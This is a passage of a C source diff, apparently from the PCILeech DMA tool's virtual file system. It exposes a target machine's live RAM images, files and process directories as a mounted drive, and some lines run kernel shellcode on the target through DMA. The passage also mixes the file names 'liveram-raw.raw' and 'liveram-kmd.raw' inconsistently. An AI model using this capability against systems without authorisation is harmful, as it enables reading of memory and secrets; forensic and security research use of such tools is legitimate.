+        Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), NULL, NULL);
+        LeaveCriticalSection(&pds->LockDma);
+        VfsCache_DirectoryDel(wcsFileName, DokanFileInfo, FALSE);
+    }
 }
 
 BOOL Vfs_IsFileInBlackList(LPCWSTR wcsFileName, PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	if(pds->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_LINUX) {
-		return !wcsncmp(wcsFileName, L"\\files\\dev\\watchdog", 19);
-	}
-	return FALSE;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    if(pds->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_LINUX) {
+        return !wcsncmp(wcsFileName, L"\\files\\dev\\watchdog", 19);
+    }
+    return FALSE;
 }
 
 VOID Vfs_SetFileTime(_Out_ PFILETIME ptDst, _In_opt_ PFILETIME ptSrcOpt, _In_ PSYSTEMTIME pSrcSystemTime)
 {
-	if(ptSrcOpt && *(PQWORD)ptSrcOpt) {
-		*(PQWORD)ptDst = *(PQWORD)ptSrcOpt;
-	} else {
-		SystemTimeToFileTime(pSrcSystemTime, ptDst);
-	}
+    if(ptSrcOpt && *(PQWORD)ptSrcOpt) {
+        *(PQWORD)ptDst = *(PQWORD)ptSrcOpt;
+    } else {
+        SystemTimeToFileTime(pSrcSystemTime, ptDst);
+    }
 }
 
 VOID Vfs_FindFilesManualEntry(_In_ LPCWSTR wcsEntryName, _In_ QWORD cb, _In_ DWORD dwFileAttributes, _In_ PFillFindData FillFindData, _In_ PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	WIN32_FIND_DATAW findData;
-	ZeroMemory(&findData, sizeof(WIN32_FIND_DATAW));
-	wcscpy_s(findData.cFileName, MAX_PATH, wcsEntryName);
-	findData.nFileSizeHigh = (DWORD)(cb >> 32);
-	findData.nFileSizeLow = (DWORD)cb;
-	findData.dwFileAttributes = dwFileAttributes;
-	SystemTimeToFileTime(&pds->time, &findData.ftCreationTime);
-	SystemTimeToFileTime(&pds->time, &findData.ftLastWriteTime);
-	SystemTimeToFileTime(&pds->time, &findData.ftLastAccessTime);
-	FillFindData(&findData, DokanFileInfo);
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    WIN32_FIND_DATAW findData;
+    ZeroMemory(&findData, sizeof(WIN32_FIND_DATAW));
+    wcscpy_s(findData.cFileName, MAX_PATH, wcsEntryName);
+    findData.nFileSizeHigh = (DWORD)(cb >> 32);
+    findData.nFileSizeLow = (DWORD)cb;
+    findData.dwFileAttributes = dwFileAttributes;
+    SystemTimeToFileTime(&pds->time, &findData.ftCreationTime);
+    SystemTimeToFileTime(&pds->time, &findData.ftLastWriteTime);
+    SystemTimeToFileTime(&pds->time, &findData.ftLastAccessTime);
+    FillFindData(&findData, DokanFileInfo);
 }
 
 VOID Vfs_StatisticsShowUpdate(_In_ PVFS_STATISTICS s)
 {
-	CONSOLE_SCREEN_BUFFER_INFO consoleInfo;
-	if(s->hConsole) {
-		GetConsoleScreenBufferInfo(s->hConsole, &consoleInfo);
-		consoleInfo.dwCursorPosition.Y = s->wConsoleCursorPosition;
-		SetConsoleCursorPosition(s->hConsole, consoleInfo.dwCursorPosition);
-	}
-	printf(
-		" CACHE STATISTICS            CACHE HIT /   CACHE MISS /        TOTAL       \n" \
-		" RAM ACCESS COUNT:   %12lli %3i%% / %12lli / %12lli       \n" \
-		" RAM BYTES READ:     %12lli %3i%% / %12lli / %12lli       \n" \
-		" FILE ACCESS COUNT:  %12lli %3i%% / %12lli / %12lli       \n" \
-		" FILE BYTES READ:    %12lli %3i%% / %12lli / %12lli       \n" \
-		" DIR LIST COUNT:     %12lli %3i%% / %12lli / %12lli       \n" \
-		" FILE LIST COUNT:    %12lli %3i%% / %12lli / %12lli       \n",
-		s->cRAM.hit,      100 * s->cRAM.hit / max(1, s->cRAM.hit + s->cRAM.miss),                s->cRAM.miss,      s->cRAM.hit + s->cRAM.miss,
-		s->cbRAM.hit,     100 * s->cbRAM.hit / max(1, s->cbRAM.hit + s->cbRAM.miss),             s->cbRAM.miss,     s->cbRAM.hit + s->cbRAM.miss,
-		s->cFILE.hit,     100 * s->cFILE.hit / max(1, s->cFILE.hit + s->cFILE.miss),             s->cFILE.miss,     s->cFILE.hit + s->cFILE.miss,
-		s->cbFILE.hit,    100 * s->cbFILE.hit / max(1, s->cbFILE.hit + s->cbFILE.miss),          s->cbFILE.miss,    s->cbFILE.hit + s->cbFILE.miss,
-		s->cLISTDIR.hit,  100 * s->cLISTDIR.hit / max(1, s->cLISTDIR.hit + s->cLISTDIR.miss),    s->cLISTDIR.miss,  s->cLISTDIR.hit + s->cLISTDIR.miss,
-		s->cLISTFILE.hit, 100 * s->cLISTFILE.hit / max(1, s->cLISTFILE.hit + s->cLISTFILE.miss), s->cLISTFILE.miss, s->cLISTFILE.hit + s->cLISTFILE.miss
-		);
-	if(!s->hConsole) {
-		s->hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
-		GetConsoleScreenBufferInfo(s->hConsole, &consoleInfo);
-		s->wConsoleCursorPosition = consoleInfo.dwCursorPosition.Y - 7;
-	}
+    CONSOLE_SCREEN_BUFFER_INFO consoleInfo;
+    if(s->hConsole) {
+        GetConsoleScreenBufferInfo(s->hConsole, &consoleInfo);
+        consoleInfo.dwCursorPosition.Y = s->wConsoleCursorPosition;
+        SetConsoleCursorPosition(s->hConsole, consoleInfo.dwCursorPosition);
+    }
+    printf(
+        " CACHE STATISTICS            CACHE HIT /   CACHE MISS /        TOTAL       \n" \
+        " RAM ACCESS COUNT:   %12lli %3i%% / %12lli / %12lli       \n" \
+        " RAM BYTES READ:     %12lli %3i%% / %12lli / %12lli       \n" \
+        " FILE ACCESS COUNT:  %12lli %3i%% / %12lli / %12lli       \n" \
+        " FILE BYTES READ:    %12lli %3i%% / %12lli / %12lli       \n" \
+        " DIR LIST COUNT:     %12lli %3i%% / %12lli / %12lli       \n" \
+        " FILE LIST COUNT:    %12lli %3i%% / %12lli / %12lli       \n",
+        s->cRAM.hit,      100 * s->cRAM.hit / max(1, s->cRAM.hit + s->cRAM.miss),                s->cRAM.miss,      s->cRAM.hit + s->cRAM.miss,
+        s->cbRAM.hit,     100 * s->cbRAM.hit / max(1, s->cbRAM.hit + s->cbRAM.miss),             s->cbRAM.miss,     s->cbRAM.hit + s->cbRAM.miss,
+        s->cFILE.hit,     100 * s->cFILE.hit / max(1, s->cFILE.hit + s->cFILE.miss),             s->cFILE.miss,     s->cFILE.hit + s->cFILE.miss,
+        s->cbFILE.hit,    100 * s->cbFILE.hit / max(1, s->cbFILE.hit + s->cbFILE.miss),          s->cbFILE.miss,    s->cbFILE.hit + s->cbFILE.miss,
+        s->cLISTDIR.hit,  100 * s->cLISTDIR.hit / max(1, s->cLISTDIR.hit + s->cLISTDIR.miss),    s->cLISTDIR.miss,  s->cLISTDIR.hit + s->cLISTDIR.miss,
+        s->cLISTFILE.hit, 100 * s->cLISTFILE.hit / max(1, s->cLISTFILE.hit + s->cLISTFILE.miss), s->cLISTFILE.miss, s->cLISTFILE.hit + s->cLISTFILE.miss
+        );
+    if(!s->hConsole) {
+        s->hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
+        GetConsoleScreenBufferInfo(s->hConsole, &consoleInfo);
+        s->wConsoleCursorPosition = consoleInfo.dwCursorPosition.Y - 7;
+    }
 }
 
 VOID Vfs_StatisticsThread(_In_ PVFS_STATISTICS s)
 {
-	while(!s->fThreadExit) {
-		Sleep(100);
-		Vfs_StatisticsShowUpdate(s);
-	}
-	ExitThread(0);
+    while(!s->fThreadExit) {
+        Sleep(100);
+        Vfs_StatisticsShowUpdate(s);
+    }
+    ExitThread(0);
 }
 
 //-------------------------------------------------------------------------------
@@ -546,396 +599,488 @@ VOID Vfs_StatisticsThread(_In_ PVFS_STATISTICS s)
 NTSTATUS DOKAN_CALLBACK
 VfsCallback_CreateFile(LPCWSTR wcsFileName, PDOKAN_IO_SECURITY_CONTEXT SecurityContext, ACCESS_MASK DesiredAccess, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	BOOL result;
-	VFS_RESULT_FILEINFO fi;
-	//VFS_OPERATION op;
-	UNREFERENCED_PARAMETER(SecurityContext);
-	UNREFERENCED_PARAMETER(FileAttributes);
-	UNREFERENCED_PARAMETER(CreateOptions);
-	// root or file directory
-	if(!wcscmp(wcsFileName, L"\\") || !_wcsicmp(wcsFileName, L"\\files")) {
-		if(CreateDisposition != CREATE_NEW && CreateDisposition != OPEN_ALWAYS && CreateDisposition != OPEN_EXISTING) {
-			return pds->DokanNtStatusFromWin32(ERROR_ACCESS_DENIED);
-		}
-		DokanFileInfo->IsDirectory = TRUE;
-		return STATUS_SUCCESS;
-	}
-	// ram dump file
-	if(!_wcsicmp(wcsFileName, L"\\liveram.raw")) {
-		if(DokanFileInfo->IsDirectory) {
-			return STATUS_NOT_A_DIRECTORY;
-		}
-		if(CreateDisposition != CREATE_NEW && CreateDisposition != OPEN_ALWAYS && CreateDisposition != OPEN_EXISTING) {
-			return pds->DokanNtStatusFromWin32(ERROR_ACCESS_DENIED);
-		}
-		DokanFileInfo->Nocache = TRUE;
-		if(CreateDisposition == OPEN_ALWAYS) {
-			return STATUS_OBJECT_NAME_COLLISION;
-		}
-		return STATUS_SUCCESS;
-	}
-	if(!_wcsnicmp(wcsFileName, L"\\files", 6)) { // matches: \files*
-		if(CreateDisposition != CREATE_NEW && CreateDisposition != OPEN_ALWAYS && CreateDisposition != OPEN_EXISTING) {
-			pds->DokanNtStatusFromWin32(ERROR_ACCESS_DENIED);
-		}
-		result = Vfs_ListSingle(wcsFileName, DokanFileInfo, &fi);
-		/*
-		TODO: allow create new files some time in the future.
-		if(!result) {
-			if(CreateDisposition == CREATE_NEW || CreateDisposition == OPEN_ALWAYS) {
-				result = _Vfs_InitVfsOperation(&op, VFS_OP_CMD_CREATE, wcsFileName, DokanFileInfo);
-				if(!result) { return STATUS_FILE_INVALID; }
-				EnterCriticalSection(&pds->LockDma);
-				Exec_ExecSilent(pds->pCfg, pds->pDeviceData, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), NULL, NULL);
-				LeaveCriticalSection(&pds->LockDma);
-				VfsCache_DirectoryDel(wcsFileName, DokanFileInfo, FALSE);
-			}
-			result = _Vfs_ListSingle(wcsFileName, DokanFileInfo, &fi);
-		}
-		*/
-		if(!result) { 
-			return STATUS_FILE_INVALID; 
-		}
-		DokanFileInfo->IsDirectory = (fi.flags & VFS_FLAGS_FILE_DIRECTORY) ? TRUE : FALSE;
-		DokanFileInfo->Nocache = TRUE;
-		return (CreateDisposition == OPEN_ALWAYS) ? STATUS_OBJECT_NAME_COLLISION : STATUS_SUCCESS;
-	}
-	return STATUS_SUCCESS;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    BOOL result;
+    VFS_RESULT_FILEINFO fi;
+    //VFS_OPERATION op;
+    UNREFERENCED_PARAMETER(SecurityContext);
+    UNREFERENCED_PARAMETER(FileAttributes);
+    UNREFERENCED_PARAMETER(CreateOptions);
+    // root, file or proc directory
+    if( !wcscmp(wcsFileName, L"\\") || 
+        (pds->fKMD && !_wcsicmp(wcsFileName, L"\\files")) || 
+        (pds->fVMM && (!_wcsicmp(wcsFileName, L"\\proc") || !_wcsicmp(wcsFileName, L"\\proc\\pid") || !_wcsicmp(wcsFileName, L"\\proc\\name")))) 
+    {
+        if(CreateDisposition != CREATE_NEW && CreateDisposition != OPEN_ALWAYS && CreateDisposition != OPEN_EXISTING) {
+            return pds->DokanNtStatusFromWin32(ERROR_ACCESS_DENIED);
+        }
+        DokanFileInfo->IsDirectory = TRUE;
+        return STATUS_SUCCESS;
+    }
+    // ram dump file
+    if(!_wcsicmp(wcsFileName, L"\\liveram-raw.raw") || !_wcsicmp(wcsFileName, L"\\liveram-native.raw")) {
+        if(DokanFileInfo->IsDirectory) {
+            return STATUS_NOT_A_DIRECTORY;
+        }
+        if(CreateDisposition != CREATE_NEW && CreateDisposition != OPEN_ALWAYS && CreateDisposition != OPEN_EXISTING) {
+            return pds->DokanNtStatusFromWin32(ERROR_ACCESS_DENIED);
+        }
+        DokanFileInfo->Nocache = TRUE;
+        if(CreateDisposition == OPEN_ALWAYS) {
+            return STATUS_OBJECT_NAME_COLLISION;
+        }
+        return STATUS_SUCCESS;
+    }
+    // matches: \files* or \proc*
+    if((!_wcsnicmp(wcsFileName, L"\\files", 6) && pds->fKMD) || (!_wcsnicmp(wcsFileName, L"\\proc\\", 6) && pds->fVMM)) {
+        if(CreateDisposition != CREATE_NEW && CreateDisposition != OPEN_ALWAYS && CreateDisposition != OPEN_EXISTING) {
+            pds->DokanNtStatusFromWin32(ERROR_ACCESS_DENIED);
+        }
+        result = Vfs_ListSingle(wcsFileName, DokanFileInfo, &fi);
+        /*
+        TODO: allow create new files some time in the future.
+        if(!result) {
+            if(CreateDisposition == CREATE_NEW || CreateDisposition == OPEN_ALWAYS) {
+                result = _Vfs_InitVfsOperation(&op, VFS_OP_CMD_CREATE, wcsFileName, DokanFileInfo);
+                if(!result) { return STATUS_FILE_INVALID; }
+                EnterCriticalSection(&pds->LockDma);
+                Exec_ExecSilent(pds->pCfg, pds->pDeviceData, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), NULL, NULL);
+                LeaveCriticalSection(&pds->LockDma);
+                VfsCache_DirectoryDel(wcsFileName, DokanFileInfo, FALSE);
+            }
+            result = _Vfs_ListSingle(wcsFileName, DokanFileInfo, &fi);
+        }
+        */
+        if(!result) { 
+            return STATUS_FILE_INVALID; 
+        }
+        DokanFileInfo->IsDirectory = (fi.flags & VFS_FLAGS_FILE_DIRECTORY) ? TRUE : FALSE;
+        DokanFileInfo->Nocache = TRUE;
+        return (CreateDisposition == OPEN_ALWAYS) ? STATUS_OBJECT_NAME_COLLISION : STATUS_SUCCESS;
+    }
+    return STATUS_SUCCESS;
 }
 
 NTSTATUS DOKAN_CALLBACK
 VfsCallback_GetFileInformation(_In_ LPCWSTR wcsFileName, _Inout_ LPBY_HANDLE_FILE_INFORMATION hfi, _In_ PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	WIN32_FIND_DATA;
-	BOOL result;
-	VFS_RESULT_FILEINFO fi;
-	if(!wcscmp(wcsFileName, L"\\") || !_wcsicmp(wcsFileName, L"\\files") || !_wcsicmp(wcsFileName, L"\\files\\")) { // root & files directory
-		SystemTimeToFileTime(&pds->time, &hfi->ftCreationTime);
-		SystemTimeToFileTime(&pds->time, &hfi->ftLastWriteTime);
-		SystemTimeToFileTime(&pds->time, &hfi->ftLastAccessTime);
-		hfi->nFileSizeHigh = 0;
-		hfi->nFileSizeLow = 0;
-		hfi->dwFileAttributes = FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
-		return STATUS_SUCCESS;
-	}
-	if(!_wcsicmp(wcsFileName, L"\\liveram.raw")) { // ram dump file
-		SystemTimeToFileTime(&pds->time, &hfi->ftCreationTime);
-		SystemTimeToFileTime(&pds->time, &hfi->ftLastWriteTime);
-		SystemTimeToFileTime(&pds->time, &hfi->ftLastAccessTime);
-		hfi->nFileSizeHigh = (DWORD)(pds->cbRAM >> 32);
-		hfi->nFileSizeLow = (DWORD)pds->cbRAM;
-		hfi->dwFileAttributes = FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
-		return STATUS_SUCCESS;
-	}
-	if(!_wcsnicmp(wcsFileName, L"\\files", 6)) { // matches: \files*
-		result = Vfs_ListSingle(wcsFileName, DokanFileInfo, &fi);
-		if(!result) { return STATUS_FILE_INVALID; }
-		_VFS_SET_FILETIME_OPT(&hfi->ftCreationTime, &fi.tCreateOpt, &pds->time);
-		_VFS_SET_FILETIME_OPT(&hfi->ftLastAccessTime, &fi.tAccessOpt, &pds->time);
-		_VFS_SET_FILETIME_OPT(&hfi->ftLastWriteTime, &fi.tModifyOpt, &pds->time);
-		hfi->nFileSizeHigh = (DWORD)(fi.cb >> 32);
-		hfi->nFileSizeLow = (DWORD)fi.cb;
-		hfi->dwFileAttributes |= FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
-		hfi->dwFileAttributes |= (fi.flags & VFS_FLAGS_FILE_NORMAL) ? FILE_ATTRIBUTE_NORMAL : 0;
-		hfi->dwFileAttributes |= (fi.flags & VFS_FLAGS_FILE_DIRECTORY) ? FILE_ATTRIBUTE_DIRECTORY : 0;
-		return STATUS_SUCCESS;
-	}
-	return STATUS_FILE_NOT_AVAILABLE;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    WIN32_FIND_DATA;
+    BOOL result;
+    VFS_RESULT_FILEINFO fi;
+    BYTE tp;
+    // root,files and proc directories
+    if( !wcscmp(wcsFileName, L"\\") ||
+        (pds->fKMD && (!_wcsicmp(wcsFileName, L"\\files") || !_wcsicmp(wcsFileName, L"\\files\\"))) ||
+        (pds->fVMM && (!_wcsicmp(wcsFileName, L"\\proc") || !_wcsicmp(wcsFileName, L"\\proc\\pid") || !_wcsicmp(wcsFileName, L"\\proc\\name"))))
+    {
+        SystemTimeToFileTime(&pds->time, &hfi->ftCreationTime);
+        SystemTimeToFileTime(&pds->time, &hfi->ftLastWriteTime);
+        SystemTimeToFileTime(&pds->time, &hfi->ftLastAccessTime);
+        hfi->nFileSizeHigh = 0;
+        hfi->nFileSizeLow = 0;
+        hfi->dwFileAttributes = FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
+        return STATUS_SUCCESS;
+    }
+    // RAM images.
+    if(!_wcsicmp(wcsFileName, L"\\liveram-kmd.raw") || !_wcsicmp(wcsFileName, L"\\liveram-native.raw")) { // ram dump file
+        SystemTimeToFileTime(&pds->time, &hfi->ftCreationTime);
+        SystemTimeToFileTime(&pds->time, &hfi->ftLastWriteTime);
+        SystemTimeToFileTime(&pds->time, &hfi->ftLastAccessTime);
+        tp = !_wcsicmp(wcsFileName, L"\\liveram-kmd.raw") ? VFS_RAM_TP_KMD : VFS_RAM_TP_NATIVE;
+        hfi->nFileSizeHigh = (DWORD)(pds->cbRAM[tp] >> 32);
+        hfi->nFileSizeLow = (DWORD)pds->cbRAM[tp];
+        hfi->dwFileAttributes = FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
+        return STATUS_SUCCESS;
+    }
+    // matches: \files* or \proc*
+    if((!_wcsnicmp(wcsFileName, L"\\files", 6) && pds->fKMD) || (!_wcsnicmp(wcsFileName, L"\\proc\\", 6) && pds->fVMM)) {
+        result = Vfs_ListSingle(wcsFileName, DokanFileInfo, &fi);
+        if(!result) { return STATUS_FILE_INVALID; }
+        _VFS_SET_FILETIME_OPT(&hfi->ftCreationTime, &fi.tCreateOpt, &pds->time);
+        _VFS_SET_FILETIME_OPT(&hfi->ftLastAccessTime, &fi.tAccessOpt, &pds->time);
+        _VFS_SET_FILETIME_OPT(&hfi->ftLastWriteTime, &fi.tModifyOpt, &pds->time);
+        hfi->nFileSizeHigh = (DWORD)(fi.cb >> 32);
+        hfi->nFileSizeLow = (DWORD)fi.cb;
+        hfi->dwFileAttributes |= FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
+        hfi->dwFileAttributes |= (fi.flags & VFS_FLAGS_FILE_NORMAL) ? FILE_ATTRIBUTE_NORMAL : 0;
+        hfi->dwFileAttributes |= (fi.flags & VFS_FLAGS_FILE_DIRECTORY) ? FILE_ATTRIBUTE_DIRECTORY : 0;
+        return STATUS_SUCCESS;
+    }
+    return STATUS_FILE_NOT_AVAILABLE;
 }
 
 NTSTATUS DOKAN_CALLBACK
 VfsCallback_FindFiles(LPCWSTR wcsFileName, PFillFindData FillFindData, PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	WIN32_FIND_DATAW findData;
-	BOOL result;
-	QWORD i, cfi;
-	PVFS_RESULT_FILEINFO pfi, pfiBase = NULL;
-	if(!wcscmp(wcsFileName, L"\\")) {
-		Vfs_FindFilesManualEntry(L"liveram.raw", pds->cbRAM, FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
-		Vfs_FindFilesManualEntry(L"files", 0, FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
-		return STATUS_SUCCESS;
-	}
-	if(!_wcsicmp(wcsFileName, L"\\liveram.raw")) {
-		Vfs_FindFilesManualEntry(L"liveram.raw", pds->cbRAM, FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
-		return STATUS_SUCCESS;
-	}
-	if(!_wcsnicmp(wcsFileName, L"\\files", 6)) { // matches: \files*
-		result = Vfs_ListDirectory(wcsFileName, DokanFileInfo, &pfiBase, &cfi);
-		if(!result) { return STATUS_SUCCESS; }
-		for(i = 0; i < cfi; i++) {
-			pfi = pfiBase + i;
-			memset(&findData, 0, sizeof(WIN32_FIND_DATAW));
-			_VFS_SET_FILETIME_OPT(&findData.ftCreationTime, &pfi->tCreateOpt, &pds->time);
-			_VFS_SET_FILETIME_OPT(&findData.ftLastAccessTime, &pfi->tAccessOpt, &pds->time);
-			_VFS_SET_FILETIME_OPT(&findData.ftLastWriteTime, &pfi->tModifyOpt, &pds->time);
-			wcscpy_s(findData.cFileName, MAX_PATH, pfi->wszFileName);
-			findData.nFileSizeHigh = (DWORD)(pfi->cb >> 32);
-			findData.nFileSizeLow = (DWORD)pfi->cb;
-			findData.dwFileAttributes |= FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
-			findData.dwFileAttributes |= (pfi->flags & VFS_FLAGS_FILE_NORMAL) ? FILE_ATTRIBUTE_NORMAL : 0;
-			findData.dwFileAttributes |= (pfi->flags & VFS_FLAGS_FILE_DIRECTORY) ? FILE_ATTRIBUTE_DIRECTORY : 0;
-			FillFindData(&findData, DokanFileInfo);
-		}
-		LocalFree(pfiBase);
-		return STATUS_SUCCESS;
-	}
-	return STATUS_SUCCESS;
-}
-
-NTSTATUS _VfsReadFile_RAM(LPVOID Buffer, DWORD BufferLength, LPDWORD ReadLength, LONGLONG Offset, PVFS_GLOBAL_STATE pds)
-{
-	BOOL result;
-	QWORD qwBaseOffset, qwBase, qwSize, qwCfgAddrMaxOrig;
-	qwBaseOffset = Offset % 0x1000;
-	qwBase = Offset - qwBaseOffset;
-	qwSize = (BufferLength + qwBaseOffset + 0xfff) & ~0xfff;
-	if(qwBase >= pds->cbRAM) {
-		*ReadLength = 0;
-		return STATUS_FILE_INVALID;
-	}
-	if(qwBase + qwSize > pds->cbRAM) {
-		qwSize -= pds->cbRAM - qwBase;
-	}
-	if(qwSize > 0x01000000) {
-		qwSize = 0x01000000;
-	}
-	*ReadLength = (DWORD)min(BufferLength, qwSize - qwBaseOffset);
-	result = VfsCache_MemGet(Buffer, Offset, *ReadLength, pds);
-	if(result) {
-		return STATUS_SUCCESS;
-	}
-	qwSize = CACHE_MEM_SIZE;
-	EnterCriticalSection(&pds->LockDma);
-	qwCfgAddrMaxOrig = pds->ctx->cfg->qwAddrMax;	// TODO: REMOVE UGLY HACK WITH ADDRMAX...
-	pds->ctx->cfg->qwAddrMax = min(pds->cbRAM, qwBase + qwSize);
-	result = Util_Read16M(pds->ctx, pds->pbDMA16M, qwBase, NULL);
-	pds->ctx->cfg->qwAddrMax = qwCfgAddrMaxOrig;
-	memcpy(Buffer, pds->pbDMA16M + qwBaseOffset, *ReadLength);
-	VfsCache_MemPut(pds->pbDMA16M, qwBase, pds);
-	LeaveCriticalSection(&pds->LockDma);
-	return STATUS_SUCCESS;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    WIN32_FIND_DATAW findData;
+    BOOL result;
+    QWORD i, cfi;
+    PVFS_RESULT_FILEINFO pfi, pfiBase = NULL;
+    if(!wcscmp(wcsFileName, L"\\")) {
+        if(pds->cbRAM[VFS_RAM_TP_KMD]) {
+            Vfs_FindFilesManualEntry(L"liveram-kmd.raw", pds->cbRAM[VFS_RAM_TP_KMD], FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        }
+        if(pds->cbRAM[VFS_RAM_TP_NATIVE]) {
+            Vfs_FindFilesManualEntry(L"liveram-native.raw", pds->cbRAM[VFS_RAM_TP_NATIVE], FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        }
+        if(pds->fKMD) {
+            Vfs_FindFilesManualEntry(L"files", 0, FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        }
+        if(pds->fVMM) {
+            Vfs_FindFilesManualEntry(L"proc", 0, FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        }
+        return STATUS_SUCCESS;
+    }
+    if(!_wcsicmp(wcsFileName, L"\\liveram-kmd.raw") && pds->cbRAM[VFS_RAM_TP_KMD]) {
+        Vfs_FindFilesManualEntry(L"liveram-kmd.raw", pds->cbRAM[VFS_RAM_TP_KMD], FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        return STATUS_SUCCESS;
+    }
+    if(!_wcsicmp(wcsFileName, L"\\liveram-native.raw") && pds->cbRAM[VFS_RAM_TP_NATIVE]) {
+        Vfs_FindFilesManualEntry(L"liveram-native.raw", pds->cbRAM[VFS_RAM_TP_NATIVE], FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        return STATUS_SUCCESS;
+    }
+    if(!_wcsicmp(wcsFileName, L"\\proc") && pds->fVMM) {
+        Vfs_FindFilesManualEntry(L"pid", 0, FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        Vfs_FindFilesManualEntry(L"name", 0, FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, FillFindData, DokanFileInfo);
+        return STATUS_SUCCESS;
+    }
+    // matches: \files* or \proc*
+    if((!_wcsnicmp(wcsFileName, L"\\files", 6) && pds->fKMD) || (!_wcsnicmp(wcsFileName, L"\\proc\\", 6) && pds->fVMM)) {
+        result = Vfs_ListDirectory(wcsFileName, DokanFileInfo, &pfiBase, &cfi);
+        if(!result) { return STATUS_SUCCESS; }
+        for(i = 0; i < cfi; i++) {
+            pfi = pfiBase + i;
+            memset(&findData, 0, sizeof(WIN32_FIND_DATAW));
+            _VFS_SET_FILETIME_OPT(&findData.ftCreationTime, &pfi->tCreateOpt, &pds->time);
+            _VFS_SET_FILETIME_OPT(&findData.ftLastAccessTime, &pfi->tAccessOpt, &pds->time);
+            _VFS_SET_FILETIME_OPT(&findData.ftLastWriteTime, &pfi->tModifyOpt, &pds->time);
+            wcscpy_s(findData.cFileName, MAX_PATH, pfi->wszFileName);
+            findData.nFileSizeHigh = (DWORD)(pfi->cb >> 32);
+            findData.nFileSizeLow = (DWORD)pfi->cb;
+            findData.dwFileAttributes |= FILE_ATTRIBUTE_NOT_CONTENT_INDEXED;
+            findData.dwFileAttributes |= (pfi->flags & VFS_FLAGS_FILE_NORMAL) ? FILE_ATTRIBUTE_NORMAL : 0;
+            findData.dwFileAttributes |= (pfi->flags & VFS_FLAGS_FILE_DIRECTORY) ? FILE_ATTRIBUTE_DIRECTORY : 0;
+            FillFindData(&findData, DokanFileInfo);
+        }
+        LocalFree(pfiBase);
+    }
+    return STATUS_SUCCESS;
+}
+
+NTSTATUS _VfsReadFile_RAM(_In_ BYTE tp, _Out_ LPVOID Buffer, _In_ DWORD BufferLength, _Out_ LPDWORD ReadLength, _In_ LONGLONG Offset, _In_ PVFS_GLOBAL_STATE pds)
+{
+    BOOL result;
+    QWORD qwBaseOffset, qwBase, qwSize, qwCfgAddrMaxOrig;
+    qwBaseOffset = Offset % 0x1000;
+    qwBase = Offset - qwBaseOffset;
